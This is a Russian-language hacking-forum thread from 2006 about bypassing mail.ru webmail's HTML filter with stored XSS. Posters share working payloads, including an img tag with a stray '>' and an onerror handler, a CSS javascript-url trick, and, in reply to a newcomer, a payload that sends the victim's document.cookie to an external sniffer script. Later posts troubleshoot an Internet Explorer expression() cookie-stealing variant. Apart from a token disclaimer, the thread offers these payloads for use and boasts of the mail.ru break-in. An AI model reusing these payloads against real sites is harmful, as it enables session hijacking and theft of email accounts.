Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.02.2006, 17:24
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Да помог то помог, только не мне, опять всё повторится... И помоему это не для всех браузеров, сейчас погляжу. Дело в img/src - эту конструкцию не все браузеры принимают, IE на ура, а вот остальные не примут вроде.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
|
|
|
15.07.2006, 19:46
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Решено спустить в общее.
Думаю, Всем будет интересно почитать историю лома mail.ru.
Кстати, данные ХSS работают на других менее "продвинутых" почтовиках 
Удачных подвигов!
Помните, данная информация предназначена только для ознакомления. Мы не рекомендуем Вам испытывать данные XSS-эксплоиты.
Powered by Antichat.ru |
|
|
|
16.07.2006, 02:21
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Наконец-то в паблике =) Сколько шуму было из этой темы. Как раз на момент её создания alsa основал АМА (пожалуй, самый закрытый на сегодня раздел) и я был первым кто в него зашел и первым моим постом в абсолютно пустом разделе стала усовершенствованная XSS. Так хотелось приписать "Первый нах!", ну вы понимаете, момент ведь исторический.
На открытие опять-таки навел Майор, он уже всё обыграв в голове и поняв просто спросил, почему работает это:
Код HTML:
<font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))">
.... И меня осенило =) Вот так всё и получается.
Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')>
Вот она работала под всеми браузерами, включая FF. Это была бомба к которой имели доступ всего 9 человек с форума =)
Фильтр терялся когда в атрибуте натыкался на закрывающий тег знак > и после него уже не смотрел.. А с точки зрения браузера всё что в кавычках - это атрибут. Поэтому генерилась ошибка и добавив обработчик onerror мы добивались своего =) Из МОА никто не догадался, хотя всё было у них перед глазами)
Пусть теперь все видят и знают что и как обсуждается в закрытых разделах. Ну и конечно стремятся туда. Кстати, из всего этого материала рукой подать до ещё одной активной XSS, но только под IE (Greetz to ZaCo =)
Удачи, господа)
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 16.07.2006 в 03:31..
|
|
|
|
16.07.2006, 13:33
|
|
Новичок
Регистрация: 18.05.2006
Сообщений: 16
Провел на форуме:
71601
Репутация:
1
|
|
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> ,подскажите пожалуйста,что надо вставлТь вместо xss ?
|
|
|
|
16.07.2006, 13:42
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Вообще вот такая запись:
Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')>
Это просто наглядно, а вариаций тут может быть куча, можете попробовать даже вот так:
Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(1)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('2')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('3')>
Просто дело вашей фантазии.
Отвечаю на вопрос:
Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=document.images[0].src="http://www.link.com/script_sniffer.php?cooki="+document.cookie;>
Что-то около того)
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 16.07.2006 в 13:48..
|
|
|
|
16.07.2006, 13:44
|
|
Новичок
Регистрация: 18.05.2006
Сообщений: 16
Провел на форуме:
71601
Репутация:
1
|
|
Огромное СПАСИБО!!!!
|
|
|
|
27.07.2006, 23:24
|
|
Познающий
Регистрация: 08.01.2006
Сообщений: 90
Провел на форуме:
1000758
Репутация:
16
|
|
Честно говоря надоело через хсс, кто б че нового придумал гг
|
|
|
|
29.07.2006, 06:40
|
|
Новичок
Регистрация: 28.07.2006
Сообщений: 1
Провел на форуме:
5151
Репутация:
0
|
|
.....
Не могу понять почему не срабатывает...
Код HTML:
<img src=\"xss\" width=0 height=0 style=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\'xss\' document.cookie;this.sas=null\" alt=\'\'>
Вот этот код после майловского фильтра...
Код HTML:
<img src=\"xss\" width=0 height=0 xstyle=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\"xss\" document.cookie;this.sas=null\" alt=\"\">
Последний раз редактировалось dikiismok; 29.07.2006 в 06:43..
|
|
|
|
01.08.2006, 20:17
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
А ты не заметил, что style отфильтровался и стал xstyle?? Поэтому и не работает.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
|
|
|
|
02.08.2006, 00:57
|
|
Новичок
Регистрация: 07.05.2006
Сообщений: 7
Провел на форуме:
5670
Репутация:
1
|
|
Не пойму, но как это все провети? не пойму отправляю письмо в вижео хтмл с кодом? обоснуйте по полочкам, плз
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
admin mail.ru
|
ISRAEL |
Чужие Статьи |
42 |
10.08.2005 05:54 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
